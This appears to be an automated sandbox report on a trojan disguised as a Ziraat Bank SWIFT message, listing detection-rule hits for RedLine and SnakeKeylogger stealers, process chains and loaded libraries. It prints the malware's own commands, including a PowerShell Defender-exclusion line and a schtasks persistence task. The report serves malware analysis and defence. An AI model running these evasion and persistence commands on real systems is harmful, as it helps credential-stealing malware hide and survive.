Source: C:\Users\user\AppData\Local\cyclop\directiveness.exe	Code function: String function: 0061F8A0 appears 35 times
Source: C:\Users\user\AppData\Local\cyclop\directiveness.exe	Code function: String function: 0060EC2F appears 68 times
Source: C:\Users\user\AppData\Local\cyclop\directiveness.exe	Code function: String function: 00616AC0 appears 42 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: String function: 0040E1D8 appears 44 times

Source: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: 2.2.directiveness.exe.39b0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 3.2.RegSvcs.exe.3f355c0.14.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 3.2.RegSvcs.exe.3f355c0.14.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.0.server01.exe.870000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 5.0.server01.exe.870000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 3.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 3.2.RegSvcs.exe.3f4d5f0.12.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 3.2.RegSvcs.exe.3f4d5f0.12.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 3.2.RegSvcs.exe.3f355c0.14.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 3.2.RegSvcs.exe.3f355c0.14.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 12.2.directiveness.exe.4060000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 3.2.RegSvcs.exe.3f65610.10.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 3.2.RegSvcs.exe.3f65610.10.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 3.2.RegSvcs.exe.3f4d5f0.12.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 3.2.RegSvcs.exe.3f4d5f0.12.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 3.2.RegSvcs.exe.3f65610.10.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 3.2.RegSvcs.exe.3f65610.10.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000003.00000002.1359842969.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000003.00000002.1368343181.0000000003F1D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0000000C.00000002.1486418778.0000000004060000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000005.00000000.1358693008.0000000000872000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000002.00000002.1355540566.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: Process Memory Space: RegSvcs.exe PID: 7752, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: server01.exe PID: 7812, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: C:\Users\user\AppData\Local\Temp\server01.exe, type: DROPPED	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: C:\Users\user\AppData\Local\Temp\server01.exe, type: DROPPED	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/

Source: server01.exe.3.dr, UltraSpeed.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: server01.exe.3.dr, COVIDPickers.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 3.2.RegSvcs.exe.3f4d5f0.12.raw.unpack, UltraSpeed.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 3.2.RegSvcs.exe.3f4d5f0.12.raw.unpack, COVIDPickers.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 3.2.RegSvcs.exe.2cb0ee8.4.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 3.2.RegSvcs.exe.2cb0ee8.4.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 3.2.RegSvcs.exe.3f355c0.14.raw.unpack, UltraSpeed.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 3.2.RegSvcs.exe.3f355c0.14.raw.unpack, COVIDPickers.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 3.2.RegSvcs.exe.2a12e3e.1.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 3.2.RegSvcs.exe.2a12e3e.1.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 3.2.RegSvcs.exe.3ee0190.13.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 3.2.RegSvcs.exe.3ee0190.13.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'

Source: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe, 00000000.00000002.1338991408.0000000000BCE000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: ;.VBP

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winEXE@23/16@2/2

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe

Code function: 0_2_000ECE7A GetLastError,FormatMessageW,

0_2_000ECE7A

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe	Code function: 0_2_000DAB84 AdjustTokenPrivileges,CloseHandle,	0_2_000DAB84
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe	Code function: 0_2_000DB134 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,	0_2_000DB134
Source: C:\Users\user\AppData\Local\cyclop\directiveness.exe	Code function: 2_2_0062AB84 AdjustTokenPrivileges,CloseHandle,	2_2_0062AB84
Source: C:\Users\user\AppData\Local\cyclop\directiveness.exe	Code function: 2_2_0062B134 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,	2_2_0062B134

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe

Code function: 0_2_000EE1FD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

0_2_000EE1FD

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe

Code function: 0_2_000E6532 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle,

0_2_000E6532

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe

Code function: 0_2_000FC18C CoInitializeSecurity,_memset,_memset,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket,

0_2_000FC18C

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe

Code function: 0_2_000A406B CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

0_2_000A406B

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe

File created: C:\Users\user\AppData\Local\cyclop

Jump to behavior

Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Mutant created: NULL
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Phoenix_Clipper_666
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7944:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7936:120:WilError_03

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe

File created: C:\Users\user\AppData\Local\Temp\aut7125.tmp

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\directiveness.vbs"

Source: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: server01.exe, 00000005.00000002.2592996086.0000000002D4E000.00000004.00000800.00020000.00000000.sdmp, server01.exe, 00000005.00000002.2592996086.0000000002D80000.00000004.00000800.00020000.00000000.sdmp, server01.exe, 00000005.00000002.2592996086.0000000002D5E000.00000004.00000800.00020000.00000000.sdmp, server01.exe, 00000005.00000002.2592996086.0000000002D6C000.00000004.00000800.00020000.00000000.sdmp, server01.exe, 00000005.00000002.2592996086.0000000002D8D000.00000004.00000800.00020000.00000000.sdmp, server01.exe, 00000005.00000002.2603263773.0000000003C9D000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe

ReversingLabs: Detection: 52%

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe

File read: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe "C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe"
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe	Process created: C:\Users\user\AppData\Local\cyclop\directiveness.exe "C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe"
Source: C:\Users\user\AppData\Local\cyclop\directiveness.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Users\user\AppData\Local\Temp\server01.exe "C:\Users\user\AppData\Local\Temp\server01.exe"
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 03:50 /du 23:59 /sc daily /ri 1 /f
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\directiveness.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\cyclop\directiveness.exe "C:\Users\user\AppData\Local\cyclop\directiveness.exe"
Source: C:\Users\user\AppData\Local\cyclop\directiveness.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\cyclop\directiveness.exe"
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process created: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe"
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe	Process created: C:\Users\user\AppData\Local\cyclop\directiveness.exe "C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\cyclop\directiveness.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Users\user\AppData\Local\Temp\server01.exe "C:\Users\user\AppData\Local\Temp\server01.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 03:50 /du 23:59 /sc daily /ri 1 /f	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process created: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\cyclop\directiveness.exe "C:\Users\user\AppData\Local\cyclop\directiveness.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\cyclop\directiveness.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\cyclop\directiveness.exe"

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\cyclop\directiveness.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\cyclop\directiveness.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\cyclop\directiveness.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\cyclop\directiveness.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\cyclop\directiveness.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\cyclop\directiveness.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\cyclop\directiveness.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\cyclop\directiveness.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\cyclop\directiveness.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\cyclop\directiveness.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\cyclop\directiveness.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\cyclop\directiveness.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\cyclop\directiveness.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Section loaded: urlmon.dll	Jump to behavior
